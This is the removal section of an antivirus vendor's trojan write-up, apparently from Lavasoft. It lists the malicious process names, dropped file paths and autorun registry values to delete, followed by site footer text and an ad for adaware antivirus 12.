  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    SecondL.exe:3664
    cKgIbDKpjiaF3kq96ZCB.exe:796
    Sho9libi.exe:3876
    %original file name%.exe:1900
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\bz0jbhi1p4f\kc2zt4jv2nb.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\Sho9libi.exe (227430 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\SecondL.exe (400 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\Sho9libi.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (31 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\63RSKBSJTG\SecondL.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpji.exe (54882 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpjiaF3kq96ZCB.exe (19522 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (36 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "OMEWPRODUCT_PMJXG" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpjiaF3kq96ZCB.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "0dlt4xjqyxw" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\bz0jbhi1p4f\kc2zt4jv2nb.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "CGXYQCF886G0GDX" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cKgIbDKpji.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
Average: 1 (3 votes)












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2025 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now